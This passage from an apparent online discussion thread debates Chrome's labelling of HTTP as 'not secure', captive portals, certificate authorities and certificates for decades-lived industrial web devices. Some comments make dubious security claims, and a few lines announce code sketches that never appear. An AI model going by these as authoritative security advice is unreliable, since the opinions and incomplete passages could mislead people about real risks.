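Note this only protects integrity, not confidentiality: anyone on the path can still read the traffic, which is part of why TLS won out.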
> What's wrong about caring about your privacy?!
Ignoring all the other concerns for the sake of it, is what's wrong.
> ISPs that want to tamper with connections to inject their ads can fuck off and die in a fire. That is more unethical than anything Google has ever done.
Google reads your e-mails and search history and tracks where you go on the internet, and sells the information to advertisers, who then display the ads no matter where you are or what you're looking at - including over HTTPS pages.
That functionality doesn't exist today, so it would be a new protocol. One that would be almost as complicated as HTTPS, would be starting from zero as opposed to the 50% usage of HTTPS on the internet, would require new code to be written which hasn't been thoroughly tested for security issues and would provide inferior assurance to HTTPS. All for the sake of being "simpler."
With regards to signing content, this already exists in the form of code signing. Given the amount of software that isn't signed I doubt it would be practical for anything else e.g. blog posts.
The imaginary user cited does not need that code in order to "browse memes".
The code is there for advertising, e.g., to attract advertisers as customers by gathering data about users.
Hence the push to HTTPS is for companies that aim to generate revenue from selling access to or information about users to advertisers.
I have no problem with HTTPS on the public web, to the extent that it is the concept of encrypted html pages, and perhaps these are authenticated pages (PGP-signed was an early suggestion).
Encrypt a page of information (file), sign it so it can be verified with a public key, and then send it over the wire. The wire (network) does not necessarily need to be secure.
However I do have a problem with SSL/TLS.
I would like to leave open the option to not use it in favor of alternative encryption schemes that may exist now or in the future. It seems one allegedly "user-focused" company wants to remove this option. Comply with their choice or be penalized.
The issue I have with TLS is only to the extent TLS is the idea of setting up a "secure channel" to some "authenticated" endpoint (cf. page), with this authentication process firmly under the control of commercial third parties, using an overly complex protocol suite and partial implementation that is continually evolving (moving target) while people scramble to try to fix every flaw that arises out of this complexity.
To the extent it is not what I describe, I have no issue. (That is, I'm pro-TLS.)
We have one company aiming to replace HTTP with their own HTTP/2 protocol, which to no surprise has features that benefit web app developers and the advertisers they seek to attract far more than they benefit users.
Could we design a scheme to encrypt users' web usage that would not benefit advertisers? I think yes. But this is not what is being developed. Encryption today is closely coupled with the "ad-supported web". If we are not careful, this sort of policy pushing by Google could cripple the non-ad-supported web that existed before the company was incorporated.
Encrypted "channels" are not the only way to protect information transferred via the web. TLS is not the only game in town.
The only use I know for captive portals is EULAs, and I'm not sure those ever had legal weight (though obviously IANAL).
But honestly they were starting to be outdated (technologically) even before this. Since a lot of popular sites use HTTPS, I usually have to try and think of a non-HTTP site before I can get through. They're just a nuisance at this point.
This is not to defend Google's actions as "altruistic" in any way. But sometimes Google's interests and the public's do align.
What? You use them to log in with some criteria more than just a username/password. For example CableWifi hotspots that let you log in with TWC, Optimum, or others.
Wifi has supported that kind of login for ages (15 years?) at the protocol level, without fucking with the traffic in a MITM fashion. OS support was there already for XP and iOS 2.0.
Every hotel room in which I've stayed has a placard on the table with the BSSID name, userID and password for the portal login.
It would be identical with 802.1X. The only difference in the UI flow is that the authentication prompt is generated by the OS, not on some HTTP page that I only remember about when I wonder why my VPN isn't coming up.
> log in with some criteria more than just a username/password
The problem there is that captive portals don't add any extra link-layer security. The network is open, so literally anyone can sniff packets.
It's uncommon, but a network using WPA2-Enterprise and user/pass uses different keys for each person (not sure if per device or per user), so you don't have to trust everyone in the room.
Now you don’t have to trust the other customers, only the bar you’re at, their ISP and a million other parties between you and the site you’re visiting.
That's a reasonable point, but I'm speaking from the perspective of the bar owner - I feel I have a duty to provide better security even if the patrons have no reason to trust me.
Like a bar is going to run account administration.. at most they’re going to set a proper password with WPA2-PSK which provides protection against outsiders. But it can’t provide protection against an active attacker that has the password.
Using WPA-Enterprise, as I understand it, requires devices to be preconfigured to authenticate with the radius server, which makes it a non-starter for the kinds of networks that use a captive portal.
No, there's no preconfiguration needed, it's just a username/password account. You choose the network, then the OS asks you for your user/pass, then you're connected.
It's the router that connects to the RADIUS server, not the device directly. And some routers have one embedded, so you don't even need to configure that, it "just works".
Wouldn't it be nice if there was an encryption mode for Wifi that ensures integrity without requiring authentication? At CCC events, the workaround is to have a WPA2-Enterprise network that accepts every username/password combination, but that's going to be hard to explain to non-technical users.
Companies can easily adapt by changing your username to the form of an email (e.g. "jsmith@optimum.net"). Many of those already offer email addresses anyway.
Then your country will look like Germany did until a few years ago, with no WiFi hotspots anywhere, not even in Starbucks, and people being careful not to open their WiFi to guests at a party even.
That's what has happened before, and that's what's just going to happen again. In Germany, the owner of a WiFi hotspot was liable for anything users on the WiFi did, unless the owner could prove that every user had signed an agreement that they would not do illegal stuff.
If it's unauthenticated, the portal doesn't give you any advantage beyond showing a message.
If it's authenticated, you should be using WPA-Enterprise anyway, which supports different logins, and actually isolates the traffic between clients, whereas those "portals" don't, allowing any other user to sniff your traffic.
Portal shows a message like "here's your temporary login/password for 4 hours". Then a user enters them to the login form. When using WPA-Enterprise, a user can also set up WPA on their device with these credentials.
When macOS connects to a Wi-Fi network it makes an HTTP connection to captive.apple.com, and if it doesn't get the expected page in response it pops up a little browser window. I much prefer this solution to hijacking page loads in my browser (which tends to have lots of annoying side effects).
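That detection scheme is simple enough to sketch. The probe URL is Apple's real convention; the function names here are made up for illustration. The OS fetches a known plain-HTTP page and, if the response isn't the expected marker, assumes a portal intercepted the request:

```python
import urllib.request

# Apple's captive-portal probe endpoint (plain HTTP on purpose, so a
# portal can intercept it).
PROBE_URL = "http://captive.apple.com/hotspot-detect.html"

def looks_captive(body: str) -> bool:
    # The genuine probe page contains "Success"; anything else suggests
    # a portal rewrote the response.
    return "Success" not in body

def probe() -> bool:
    # A real check would fetch PROBE_URL over the network:
    with urllib.request.urlopen(PROBE_URL, timeout=5) as resp:
        return looks_captive(resp.read().decode(errors="replace"))

# Offline check of the decision logic (no network needed):
assert not looks_captive("<HTML><BODY>Success</BODY></HTML>")
assert looks_captive("<html>Welcome! Please accept our terms</html>")
```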
If you have to use an internet provider that does not provide reasonably direct access to the internet, you should tunnel your traffic through the service that does (e.g. a VPN).
The idea that all internet sites have to compensate for the low quality of the last mile of some users simply does not make sense. If a site accepts sensitive input from the users then sure, it needs an authenticated and encrypted connection; but if it serves static content, it may hold the internet infrastructure and the receivers responsible for the correct delivery.
I would have trouble following security advice from a company that was serving mining ads directly from its websites last week.
The main argument in favor of HTTP, from a privacy standpoint, would be that it makes browser fingerprinting harder. HTTPS by itself lets the server identify its clients individually without cookies.
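The tracking concern can be illustrated with a toy model (this is NOT the actual TLS machinery, just the shape of the problem): a server mints a random session ticket for each new client and recognizes the client whenever that ticket is presented again, no cookies involved. The `issued` dict stands in for a per-client tracking profile.

```python
from typing import Optional
import secrets

issued = {}  # ticket -> visit count; stands in for a tracking profile

def handshake(ticket: Optional[str]) -> str:
    if ticket in issued:
        issued[ticket] += 1      # resumed session: client re-identified
        return ticket
    new = secrets.token_hex(16)  # fresh session: mint a new identifier
    issued[new] = 1
    return new

t = handshake(None)
assert handshake(t) == t
assert issued[t] == 2            # the server linked the two visits
```

Browsers mitigate this in practice by limiting session lifetimes and partitioning session caches, but the underlying capability is real.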
As for reasons, there are tons of folks with personal websites on providers that only offer expensive yearly certificate options. Most CDN providers don't support Let's Encrypt. Most shared hosts don't. The Cloud Sites platform for multi-site shared hosting (formerly RackSpace, now at Liquid Web) that I use for a dozen of my friends' sites, which I host for free, doesn't. So, essentially, this means that personal hosted websites either stay 'not secure', get ditched, or increase in price quite a lot. Yes, it's just 5 to 10 bucks a month to spin up another instance on Digital Ocean, but it's yet another 'server' to manage when I'd rather decrease the number than increase it.
My only issue is HTTP/2 client and servers only implementing TLS. This makes it unnecessarily hard to reverse-proxy HTTP/2 on a loopback connection where it's reasonable to assume being safe from MITM.
The existence of vulnerabilities doesn’t negate the bullshit security theatre of certificate authorities.
Banning http is a great example of tossing the baby with the bathwater.
Https is better, but there are still valuable use cases for unencrypted web traffic.
I am sorry this bugs you, but please note that your straw man is not the argument I'd make. Sometimes you need a low hassle web server. Renewing Let's Encrypt certs is not low hassle.
> The existence of vulnerabilities doesn’t negate the bullshit security theatre of certificate authorities.
I agree that the current CA system has flaws, but there are efforts such as Certificate Transparency[1] and DANE[2] attempting to improve or bypass the CA system. That said, just having encryption defeats passive eavesdropping, and even the current CA system of authentication raises the bar for active eavesdropping.
> Banning http is a great example of tossing the baby with the bathwater.
I'm not sure what you mean by that.
> Https is better, but there are still valuable use cases for unencrypted web traffic.
Let's take it as given that HTTP is the right answer in that situation; I'm not saying it is or isn't, but let's assume it is. We're talking about HTTP(S) in web browsers and client-side applications; no one is actually talking about _banning_ HTTP, e.g. blocking port 80 or filtering via deep packet inspection. If you have a use case where after careful thought you decide that HTTP is better than HTTPS, then fine. But HTTPS should be the default.
For web sites and web browsers, sure. But if you want to use HTTP for your BIOS updates (dozzie's example), then go ahead; I don't think anyone is seriously proposing to stop you. Just please make sure that it's done securely. Anyway, TLS is not enough for secure updates.
To be clear the ONLY reason this is happening is to make sure that any ad served from Google is not tampered with. This is protection for their money making machine. Plain and simple.
The attack surface of browsers is relatively small if you keep them up to date. Browsers were early in including meltdown and spectre.
Running JavaScript is pretty harmless.
On the other hand, HTTPS makes web performance horrible.
As long as this is just a non-obnoxious warning that translates http to something in plain English I can sort of live with it. But as soon as browsers start to inject security warnings, this is going to be very, very bad.
Our company manufactures devices for use in labs and industrial processes. They need complex user interfaces and there is a push to implement them with HTTP, HTML and JS, with the device as the web server. The devices are usually installed in controlled, isolated internal networks.
Our clients run these devices for a long time. 20 or 30 years are not unheard of. They also do not update them if there is no malfunction (they work and our clients love it that way).
Now how the hell do we create a webserver that will work reliably for the next 30 years if we have to embed SSL certificates with built-in expiration dates in the range of 1 to 3 years?
> how the hell do we create a webserver that will work reliably for the next 30 years if we have to embed SSL certificates with built-in expiration dates in the range of 1 to 3 years
If there's a requirement that your code needs to run for 30 years without an update then current web technology is probably the wrong choice.
A common use case is a device serving a status report as a single simple, static, read-only (i.e. the backend has no intended ability to receive data) html file with limited or no markup. This can reasonably be expected to run for 30 years without an update - there's nothing to update, you have a fixed hardware system showing the same type of numbers to the user until it dies.
Serving this over http in a secure network would be reasonable.
Serving this over https would be reasonable if you can embed a certificate with an appropriate lifetime. Which you can't.
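A device in that position needs nothing beyond the standard library. The following is a minimal sketch, assuming a trusted closed network where plain HTTP is acceptable (the `render_status` helper, the sensor values, and the port number are made up for illustration):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

def render_status(temp_c: float, pressure_hpa: float) -> bytes:
    # Static, read-only markup: no scripts, no form inputs, nothing to patch.
    return (f"<html><body>temp: {temp_c:.1f} C, "
            f"pressure: {pressure_hpa:.0f} hPa</body></html>").encode()

class StatusHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = render_status(21.3, 1013)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

def serve() -> None:
    # Plain HTTP on the isolated network: no certificate, so nothing
    # expires over the device's multi-decade service life.
    HTTPServer(("0.0.0.0", 8080), StatusHandler).serve_forever()
```

Call `serve()` to run it; the part with a built-in shelf life here is the browser on the other end, not the certificate.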
30 years ago browsers didn't exist, so the assumption that in 30 years time they're still going to be compatible with today's servers seems wrong to me. The equivalent would be that you were building this device in 1987 and you embedded a Gopher server on it. It'd still be accessible today but users wouldn't be very happy about how they access it.
As another user said, you own both sides of this problem so write your own client software.
If I write my own client software, that's far less likely to be the case. Writing your own is exactly the thing that you should avoid if long-term compatibility is important, sticking to open standards is a much better way to do that.
Using your own example illustrates it perfectly: if I had a 30 year old device running a Gopher server, that would be usable and I would easily be able to get a client running on a modern computer/OS - but if it needed 30 year old custom client software, then porting it would likely be a quite nasty project.
That example you linked uses absolutely NO CSS or JS! Which yes, is fine and in theory it should work "forever", but any extra functionality and you can't be sure.
Open standards change, software changes and things move on. If you are seriously relying on anything technological working for a decade or more you're out your mind.
You need to keep up and adapt because nobody gives a crap about you or your use case. Here we see Google doing what it thinks best and you need to live with this.
Of course it doesn't use CSS and JS, none of those existed back in 1992 when the website was made.
However, content using CSS1 and javascript 1.0 standards (1996?) should also work in modern browsers; but I couldn't easily find any sites that actually use them and haven't been updated for the last 20+ years to test it; the sites from e.g. 1997-1999 seem to avoid it like the plague since back then you couldn't rely on CSS1 and javascript 1.0 being properly supported.
So yes, just as modern browsers support all web technologies since their very start - a CSS3 compliant browser should be compatible also with CSS2 and CSS1 (20+years old), I'm quite convinced that 20 years into future when we might have CSS 5 or 6, the current CSS3 content will also work as well. New javascript doesn't work on ancient browsers, but ancient javascript works well in modern browsers, that's a core design principle of the web standards - we build them for compatibility.
> The equivalent would be that you were building this device in 1987 and you embedded a Gopher server on it. It'd still be accessible today but users wouldn't be very happy about how they access it.
By using firefox 56? I'm not seeing the issue.
> As another user said, you own both sides of this problem so write your own client software.
Running 30 year old DOS software is a lot more painful than accessing a Gopher server. Is that really the comparison you want to make?
Sadly it's more of a 'wrong' requirement from the customer. Today's enterprise customers expect things to Just Work. They say 'just sell us a goddam appliance, we'll point a browser at it and we'll call it a day!'. I'm quoting real customers' documents here: 'it should be as easy as Apple'. We've done it to ourselves.
I expect things to just work and I expect them to work for a reasonable lifespan. I often think that a piece of software ought to live as long as a car, and for something commercially created (e.g. costs as much as a house) then it ought to last at least a generation (30years).
I don't think I'm being unreasonable here. In a closed system this should be doable.
edit: one of the reasons I think this is that we are supposed to be engineers, and other engineering disciplines do it (and their disciplines involve computers too). Consider jets and boats.
Jets, boats, and cars all require regular servicing. Parts need fixing and updating and it isn't one and done. The allegory isn't exactly the same as software updates but the allegory of software systems to cars isn't exact either.
I get what you say. But are you, let's say, a Catia ISO programmer who has been thrown in as the leader of a project team whose purpose is to buy some piece of third-party software that will automagically cut your programming time by half?
He may be an engineer, whatever that means, but still: the average joe in that position will not spend a single second on thinking if he expects the solution he's buying to work for a reasonable lifespan. He's been thrown in a project, that's all. If you force him to state a requirement on the expected lifespan, he will surely say 'Well, as long as possible seems good to me'.
Disclaimer: statistics applies here, of course some people will care, but I'm speaking about the 80%, if not more.
Until there is tangible motivation (i.e. multiple players get publicly put out of business by lax security), customers will continue to refuse to understand things they cannot put their hands on.
But I recently had to watch from the sidelines as our management decided against .Net and Qt as the future stack for user interfaces. In the case of Qt the arguments were clearly misinformed, but I only got to comment on that after the fact. So now we will have to deal with web stacks by decree.
Sadly, medical and industrial "isolated networks" have turned out to be huge cans of worms. Never trust the network. Doubly so when you're faced against threats 30 years into the future.
> Now how the hell do we create a webserver that will work reliably for the next 30 years if we have to embed SSL certificates with built-in expiration dates in the range of 1 to 3 years?
You can use self-signed certificates. Your clients will have to trust them (by updating their stores). That's hardly an ideal solution (deployment and security wise).
More broadly speaking, you can't rely on anything to stay the same in 30 years, in terms of infrastructure. Many companies therefore deliver both the devices themselves, as-well as the systems to control them (ie. custom laptops/tablets). More costly for everyone involved.
If your clients trust the self-signed certificates (by updating their certificate stores, adding a self-signed root CA), then, as of today, as far as I'm aware there won't be any warnings. No guarantees that this situation won't change further down the road.
I doubt there'll be any warnings. Otherwise Chrome wouldn't work in company networks. If you have domains that are just available internally (not even on public DNS), self signing is the logical solution. Still provides you with the advantages of encryption.
Sidebar: Why are you looking at web technologies if you aren't expecting to make any updates for 20-30 years? Is the interest for speedier development?
Welcome to the world of web compatibility: lots of companies make a nice buck from its quick evolution. And this can be a very good thing for you too, if you play it well.
For internal use the answer is self-signed certificate. However I wouldn't count on web browser based software compatibility to last even 10 years. I think browser vendors at some point will decide to ditch <512-bit certs or some encryption scheme and one needs to make a cert/server upgrade. Some option may be Firefox ESR [0] requirement to ease an adoption.
Moreover, the browser is the UI part of your solution, and you need to define some requirements - this should be all right for well-administrated environments. If the user for any reason upgrades/changes the browser but not your device, then this is user-introduced incompatibility. Your EULA should cover that. Also you should send notifications, or just show some message in the device panel, telling your customers that they need an upgrade if they want to use the given browser past version X.
Customers need to learn that web means edge tech and that needs frequent upgrades. Their isolated internal network of the past e.g based on WiFi WEP would be practically a network open to bad actors today.
Actually, in industrial environments that seems like the perfect choice.
Over 30 years, you'll find vulnerabilities in pretty much anything; so you don't want that device on an open network anyway. But, you can put it on an isolated VLAN, configure it so that it's accessible only by that proxy and no other computers, and then all the http traffic is in the isolated part, and the users access the proxy through https.
I'll be honest, I've never set up the thing I mentioned, but it sounds vastly less error-prone than writing some certificate update support (likely written in C/C++) that writes the certificate bytes directly to the devices.
Initial can-of-worm questions are "who's allowed to update the cert?", "how does the device authenticate the person updating it?", "what's the failure mode if an update goes wrong?", "how long shall we test the new cert-writing module?", "will the customer even bother after the initial certs we install for them expire, or will they instead just tell their users to flip the Chrome flag?", "how do we also update TLS and crypto libraries to support future certs or standards?"
>Our clients run these devices for a long time. 20 or 30 years are not unheard of.
Have you actually had clients run those html/js based devices "for 20 or 30 years" (e.g. have some running since 1997) or is this a totally hypothetical scenario?
About a month ago I attempted to restore a DOS-based industrial HMI panel that we shipped mid-1995. The 2 MiB of proprietary custom 72-pin SIMM flash memory had gone corrupt, and neither we nor the panel's OEM possessed the original software for restoration. We did have a later version of the software from 1997, but it needed a whopping 4 MiB to install. The machine was in active production until about two years ago, according to the customer.
I fully expect most of the systems that we are shipping now to be run for the next twenty years as well. Until security issues start losing customers buckets of money, they're not going to care one bit.
Heavy industry is concerned only with keeping their production lines up and running. They will do amazing and scary things if it helps them keeping production up. These people have absolutely no idea of security or even IT. They want to bolt and wire devices together so that they work. All the cool tech hidden inside is way beyond their understanding for the most part.
> About a month ago I attempted to restore a DOS-based industrial HMI panel that we shipped mid-1995. The 2 MiB of proprietary custom 72-pin SIMM flash memory had gone corrupt, and neither we nor the panel's OEM possessed the original software for restoration. We did have a later version of the software from 1997, but it needed a whopping 4 MiB to install.
Sure, and there are COBOL systems running since the 70s. But I asked for such an example in web technologies. The one described above isn't.
>I fully expect most of the systems that we are shipping now to be run for the next twenty years as well.
It is still not unreasonable to believe that such systems exist, and those systems will become more prevalent over time. An EtherNet/IP-controlled servo drive with an HTTP configuration page installed in 2008 will likely still be running in 2028.
> All kinds of things can change or be deprecated.
That's cute. If you truly believe a simple declaration of deprecation will stop the use of something, I have some oceanfront property in Afghanistan to sell you.
Our customers do indeed run devices from us and from competitors for decades. These lifespans are normal and expected. We currently manufacture and sell devices that have been developed 10 to 15 years ago with virtually no changes.
Internally, we have a push to transition user interfaces for future products to HTML/JS over HTTP. This was sold to our management as a solution with long term stability.
Networks which use the private network address blocks are not necessarily trusted networks (consider open Wi-Fi hotspots). Also, private networks do not necessarily use private network address blocks—intranets frequently use publicly-routable IP addresses where possible, as it simplifies linking physically distinct intranets. With IPv6 eliminating the scarcity of public addresses we can expect this to become much more common, even among home users.
The fact that the IP address is publicly routable does not imply that the server is actually reachable from the public Internet—that depends on the firewall.
You can associate public hostnames with private-range IP addresses as well, and obtain certificates for them. The main point was that the use of private, non-routable IP addresses does not imply that the network is trusted, and thus is not sufficient reason to exempt the server from securely identifying itself.
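The point can be made concrete with Python's `ipaddress` module: a "private range ⇒ trusted" heuristic computes something like the check below, and neither answer tells you anything about who is actually on the network (the addresses are arbitrary examples):

```python
import ipaddress

def looks_internal(ip: str) -> bool:
    # The naive heuristic: private-registry address => "trusted network".
    return ipaddress.ip_address(ip).is_private

# An open coffee-shop hotspot hands out addresses like this one:
assert looks_internal("192.168.1.10")
# ...while publicly routable space (like this address) may sit
# behind a firewall on an intranet:
assert not looks_internal("8.8.8.8")
```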
So don’t use Chrome 68. Use whatever version you have now. Since you clearly aren’t intending to update anything for “30 years,” then it shouldn’t matter. If you were intending on keeping systems updated, could you reasonably depend on a web browser developer keeping things constant enough for 30 YEARS? If it’s a closed system, you control everything right? So use what works now.
The parent may not be able to dictate browser compatibility, actually. Customers will use whatever they want, and if it doesn't work then they'll just 'whine' to the sales rep next time he tries to sell them something. Do this too much and it's a recipe for disaster.
Our clients are unwilling to update device firmware, not us. They will happily upgrade their usual IT infrastructure over time, though. So we cannot realistically dictate browsers or browser versions.
Of all the complexity and unknown that are embedded in projects with decades of lifespan, for this one in particular the solution is quite straightforward: roll your own certificate authority and relative certificate distribution and deployment scripts.
This only works as long as SHA-256 certs remain supported, which I doubt will be the case for the next 30 years.
I know plenty of devices which can't be used correctly any more since SHA-1 and SSLv2/SSLv3 were deprecated, because they generated a CA+cert with 512/1024-bit keys.
And then we'd have to tell our clients how to add the root cert to their browsers and operating systems. I doubt that this would fly with many customers.
I'm glad this is happening, although I'm more excited for the day when they start very obviously marking password input fields as "NOT SECURE" when they are used on HTTP sites. Although I am genuinely surprised how much Google and others like Mozilla have had to drag many site owners kicking and screaming into HTTPS. I never would have imagined that end-to-end encryption by default would be considered "controversial".
Also, those HTTPS numbers are amazing!
* Over 68% of Chrome traffic on both Android and Windows is now protected
* Over 78% of Chrome traffic on both Chrome OS and Mac is now protected
* 81 of the top 100 sites on the web use HTTPS by default
> Although I am genuinely surprised how much Google and others like Mozilla have had to drag many site owners kicking and screaming into HTTPS
Personally i am very concerned about how much power Google has over the web - all it takes to change how millions of web sites work and look is a random decision by Google.
What bothers me even more is that most people do not seem to care much because they happen to agree with what Google is doing (so far). However i think that sites should make decisions on their configuration, layout, mobile friendliness and other things because they want to, not because they are forced by Google through taking advantage of their position and biasing what people see towards what they believe people should see.
I do not like that Google basically dictates how the web should behave.
(actually it isn't only the web, but also mail - just recently i had a mail of mine end up in the spam folder of someone else's GMail account because who knows which of the 1983847813 things i didn't configure exactly as Google likes in my mail server... and of course the "solution" that many people present to this is to hand all my communications to Google)
> However i think that sites should make decisions on their configuration
It's OK when they know what they are doing, but that's not always the case.
Before my trip to Kaua'i I googled some dive shops on the island to book a scuba diving trip. Every dive shop on the island seems to be using the same vendor to process online reservation orders, which has the same form to input your credit card number, with some text around it saying "it's secure". They are not secure. They are on HTTP: https://twitter.com/fishywang/status/895133987525476354
Agreed that in a situation like this it's near impossible to ascertain that the iframe target wasn't altered, unless you already somehow know what it was before you got MITM'd.
Yeah, that’s a little better, but can’t an attacker inject something in the surrounding page that compromises the iframe? Or even rewrite the iframe to use a proxy under the attacker's control?
Maybe the vendor improved since then (it's still not very secure as others and Chrome pointed out), but I remembered that back last Aug I searched for "https" in the source code and that's not the case.
This is possible because of how ubiquitous the idea of HTTPS-all-the-things is now, not the other way around. Further, HTTP IS insecure (the S literally means secure), so...
I feel the push to HTTPS is bike shedding. It solves a problem, but it's not a big problem.
Most people don't need HTTPS for most sites. I think it's safe to say most security and privacy breaches are due to poor practices on the back end or by end users.
Man-in-the-middle attacks are more common than you'd think. Many corporate networks inspect outbound network traffic. I've heard of some coffee shop WiFi spots that also modify traffic to inject ads. Having someone tamper with your traffic is a big deal. Especially considering that many websites people visit are sensitive in nature; e.g. Google almost certainly knows more about me than any other human being -- they might even know more about me than I know about myself.
Most corporate networks are going to inspect or block HTTPS traffic too. They have security and regulatory compliance concerns, and consequently deploying tools capable of intercepting that traffic is pretty much the norm these days. It's all but certain that if you have a work PC then your contract/handbook/etc. states that this may happen, unless you're in an area where the legal basis for this sort of inspection is weaker.
Protecting people who aren't at work but are using a potentially hostile network (public WiFi, etc.) from their own device is certainly a legitimate concern.
Of course, this is a feature in certain contexts: I’d love to be able to inspect all the traffic going in and out of my home network and possibly even modify it at the edge device.
I've inspected my own HTTPS traffic a number of times using it, including traffic from iPads where my desktop was effectively acting as "the edge device". Of course, this is more for debugging than aggregate statistics/monitoring...
This won't let you inspect traffic secured via certificate pinning without additional reverse engineering to figure out how to replace the pinned cert, but it'll work fine for vanilla HTTPS / generic CA based stuff (e.g. all browser traffic.)
> This won't let you inspect traffic secured via certificate pinning without additional reverse engineering to figure out how to replace the pinned cert
Replacing a cert doesn't get around cert pinning. That is the exact use case that cert pinning protects against.
It appears you're talking about pinning in browsers only, so I'll address from that perspective only.
For public certs: Yes, but that would only produce the desired effect if the site hadn't yet been pinned, and this was a first connection, or in the case of the pins having expired. In other words, the pinning can only be stripped out if there is no pinning already in place on the client.
However, this will soon be a moot point, as Chrome is removing pinning in favor of cert transparency. This will reopen this security hole in browsers simply trying to be secure within captive portals and other insecure networks. Tor has pinning that would extend from inside the portal to outside, so that may be one option, but I don't yet know how sturdy that is.
Firefox at least will disable pinning if it sees a certificate signed by a user-supplied CA, on the one hand to facilitate this kind of debugging and on the other because otherwise enterprises using MITM boxes wouldn't be able to use Firefox. I suspect Chrome does too.
That's simply not true. 99% of the time I couldn't care less if a middle man sniffs my traffic. HTTPS is for that other 1% of the time.
The hypocrisy here is amazing, too, because while pushing HTTPS, Google itself is actively following everybody around, tracking everything they do online.
The obvious one is that it makes your traffic hard or impossible to sniff.
What's often overlooked is that it also makes your session highly resistant to tampering by 3rd parties. These parties include:
1. Anybody who might have access to your home WIFI network.
2. Your Internet Service Provider. There's been plenty of documented cases where ISPs have injected 'harmless' HTML.
3. Any number of bad actors if you're using any kind of public WIFI.
4. National actors. That's the NSA in the United States, where we have clear evidence that they have been capable of intercepting unsecured connections and injecting unreleased attacks into targeted computers.
This is not tinfoil hat stuff.
The benefit of https is undeniably greater than the cost.
I'm not crazy about how Google throws their weight around in a lot of cases either. But in this case, I think they're doing the right thing.
1 and 3 are due to poor end user security and won't be solved by HTTPS, and 2 and 4 are lost causes and also not solved by HTTPS.
An ISP is by definition a man in the middle, and unless the user checks certificates for every page and resource they fetch then the ISP can inject their own certs and monitor traffic if they really want to.
And most of the time national actors like the NSA will have better ways of getting the information if they need it
An ISP could inject their own certs very easily. Send an email to customers -- here run our "tune up" app to speed up your computer. A huge portion of customers would probably do it. Bingo, new CA roots installed.
In that case the ISP would be inducing the user to install malware. If the ISP is willing to do that, then you should probably view them as malevolent adversaries in your security model. I don't really think that an OS can protect against this in any reasonable way if that OS allows users to update certificate stores themselves. I don't really view this as a problem with the certificate model as opposed to plain old social engineering.
In any case, I don't think "an ISP could inject their own certs very easily" is a fair characterization unless you put it on the same footing as "anyone with your email can get people to install malware easily".
I'd like to see something comparing the number of people blackmailed or exploited by sniffed HTTP traffic versus the number of people affected by back end exploits or social engineering. Everybody screams about HTTPS because it's easy to do, but it's a tiny problem in the grand scheme of things, and it gives people a misplaced sense of security.
To be fair, there's not much that browser makers can do about back end exploits and social engineering. Google aren't in the business of writing back ends for third parties, and it's difficult to know if a website's back end is insecure, so I don't know who you expect to hear "scream", or who they would scream about.
The article is about one practical measure that a browser maker has taken to improve the piece of user-facing software that they are responsible for, and some users of that software are applauding this improvement.
Having said that, I do accept your overall point that there is a lot of other work that still needs to be done in securing the web. As you suggest, that's not going to be easy, but let's not fail to fix the things that we can fix already.
It's not a big problem if the traffic is inconsequential.
If I'm passively browsing I don't really care too much. If I'm submitting forms, or working in a authenticated session, that's a different matter of course.
And as easy as it is to get a certificate these days, what does it really prove? It stops 3rd party snooping, but then again so does a self-signed certificate.
I think you're confusing authentication with encryption. If you were MITMing someone and using a self-signed cert for example.com, that connection can be encrypted (if the user clicks through the warnings), but that says nothing about your trust in the site.
Let's Encrypt, or any other low-cost SSL certificate, says very little about my trust for the site either. It's just too easy to get them to think they really mean anything.
All new certificates for DNS names in the Web PKI today (and for some time now) must result from the CA having used one of the Ten Blessed Methods to validate the Applicant's control over the name, regardless of who paid how much.
Let's Encrypt offered three of the Ten, but one was discovered to be flawed due to the way some major bulk hosting services are configured, so that leaves two (of Nine, since in practice any implementation of the Tenth Blessed Method is flawed the same way).
Even flawed Blessed Methods are far superior to the checking (basically none) we can reasonably expect from a normal person using a web browser. But still, improvements upon the Blessed Methods are a topic of public discussion, if you think you genuinely have a better way you should definitely let the CA/B Forum or m.d.s.policy know about it.
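For readers wondering what one of these validation methods actually looks like in practice: the most common one Let's Encrypt uses is ACME's HTTP-01 challenge (RFC 8555), where the applicant must serve a "key authorization" string at a well-known URL on the domain being validated. A minimal sketch of computing that string, assuming a JWK dict that contains only the key's required members (the token and truncated key below are made-up illustration values):

```python
import base64
import hashlib
import json

def b64url(data: bytes) -> str:
    # Base64url without padding, as ACME requires.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def key_authorization(token: str, account_jwk: dict) -> str:
    # RFC 7638 JWK thumbprint: SHA-256 over the canonical JSON of the
    # key's required members, sorted lexicographically, no whitespace.
    canonical = json.dumps(account_jwk, sort_keys=True, separators=(",", ":"))
    thumbprint = b64url(hashlib.sha256(canonical.encode()).digest())
    # Served at http://<domain>/.well-known/acme-challenge/<token>
    return f"{token}.{thumbprint}"

jwk = {"e": "AQAB", "kty": "RSA", "n": "0vx7..."}  # hypothetical, truncated
print(key_authorization("evaGxfADs6pSRb2LAv9IZf17Dt3juxGJ-PCt92wr-oA", jwk))
```

The CA then fetches that URL over plain HTTP; only someone who controls both the web server for the name and the ACME account key can produce the right string, which is the whole basis of the domain-control claim.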
Having any valid cert (DV or otherwise) proves that you are viewing the example.com that the owner of example.com wants you to see. Without a certificate, you can/will be MITMed.
>It's just too easy to get them to think they really mean anything.
I'm not sure what you mean by this:
1. Are you saying that there is a vulnerability where you can get a valid certificate for a domain you don't own?
2. Do you mean the fact that valid owners of a domain can get a certificate easily?
If 1, please provide more info. If 2, why is that a bad thing?
I agree. Nobody is attacked using MITM, which is the only thing HTTPS prevents. Most credential leaks are due to insufficient security at the server, not the connection.
If the connection were HTTPS they could simply block it or redirect it wherever they want to give the same message. An ISP will always be able to MITM the connection.
You can't redirect HTTPS traffic unless you have a root certificate or have the private key of the site, and blocking HTTPS traffic would make at least 68% of web traffic not work, so not a real option.
Exactly. It will show up in any modern browser with a big red "This site is not safe!" type of message if that were to happen. This is one of the reasons Google (and others) so meticulously protect the certificate infrastructure, and run efforts like https://www.certificate-transparency.org/
It's not important at all for most people. How many times have you been MITM'd? I'll tell you about me: zero. Nobody cares enough about me to do that.
You know what people get bitten by? Hacked servers where the whole website is under a phisher's control or malicious website which downloads malware to your machine or sells your data (eg, Google, Facebook).
Maybe my knowledge is lacking, so please tell me what those 4 things are that you're being so elusive about. I suspect they are also as unlikely as MITM.
